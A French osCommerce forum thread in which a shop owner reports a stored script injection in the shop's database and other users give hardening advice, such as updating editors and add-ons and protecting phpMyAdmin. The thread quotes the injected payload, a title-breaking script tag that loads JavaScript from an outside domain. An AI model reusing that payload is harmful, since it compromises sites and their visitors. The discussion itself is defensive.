Version imprimable du sujet

Cliquez ici pour voir ce sujet dans son format original

Forum osCommerce-fr _ Sécurité - Mises à jour _ [Resolu] Code injecte : script src=http://exero.eu/catalog/jquery.js

Écrit par : ipolis 3 Aug 2011, 15:45

Bonjour a tous,

J'ai eu une injection de code dans la table configuration de ma boutique Osc.
Champ : configuration_value : code injecté : [Nom de ma boutique] </title><script src=http://exero.eu/catalog/jquery.js></script><title>

J'ai retiré ce code maléfique, qui redirigé et empeché toute execution du code suivant sur mes pages (Login, checkout, etc...)

Mon probleme maintenant : J'ai effectué y'a pas mal de temps toute la SECU initiale préconisé ici sur les forums depuis bien longtemps. ADMIN renomé, File_manager viré, fichier index.php et index.html dans les reps images, droits linux minimums pour OSC...

Seul un FckEditor et un TinyMCE sur cet hebergement me questionne coté SECU... (ou la je ne suis pas sur du tout de moi.. pffff)
(Je n'ai pas PHPMyvisites d'installés ni PHPBB... )

Ma question : comment proteger le MIEUX mon OSC pour eviter des injections dans la BD ? (J'ai lu les FAQs aussi et mis en pratique)
Des hackers d'un nouveau genre ?

Écrit par : chrysalide 3 Aug 2011, 16:07

quel type d'hébergement utilises-tu ? mutu ou dedi ? et chez qui ? <- je n'avais pas lu ta signature......


edit : les répertoires de FckEditor et TinyMCE sont dans l'admin ?

Utilises tu d'autres contribs que celles inscritent dans ta signature ? comme Additional Images, etc.


Écrit par : ipolis 3 Aug 2011, 16:16

Je suis en MUTU chez OVH un 90 PLAN
et FCKEditor et TynyMCE sont dans l'admin

J'utilises la contrib que tu cites pour les images additionnelles
Et bien d'autres aussi, ma signature n'est pas à jour coté contribs.

Écrit par : chrysalide 3 Aug 2011, 16:21

as tu installé phpmyadmin sur ton hébergement ou utilies tu celui d'OVH? si oui , ou ?

as tu vérifié les droit en lecture sur configure.php ? quels sont les droites sur ce fichier et sur le rep includes ?


Écrit par : chrysalide 3 Aug 2011, 16:23

Citation (ipolis @ 3 Aug 2011, 16:16) *
J'utilises la contrib que tu cites pour les images additionnelles


verifies la version utilisée et mets a jour si necessaire.

Écrit par : ipolis 3 Aug 2011, 16:26


phpmyadmin installé a la racine du site et securisé apache

crawltrack et crawlprotect installé aussi

Cote version PhPMyadmin, je dois pas etre bien a jour...
Et pour le scripts des images additionnelles non plus...

Fckeditor et TYNYMce, y'a des versions securisé a jour integrable dans l'ADMIN de OSC sans trop modifier du code ?

Écrit par : chrysalide 3 Aug 2011, 16:31

Citation (ipolis @ 3 Aug 2011, 16:26) *
phpmyadmin installé a la racine du site et securisé apache


déplaces le dans le rep admin et que celui soit protégé par htaccess + htpasswd

Écrit par : ipolis 6 Aug 2011, 16:23

Bon voila qui semble etre tout a fait en ordre en appliquant vos conseils et en reprenant la FAQ
sur la Secu OSC..
Merci !

Propulsé par Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)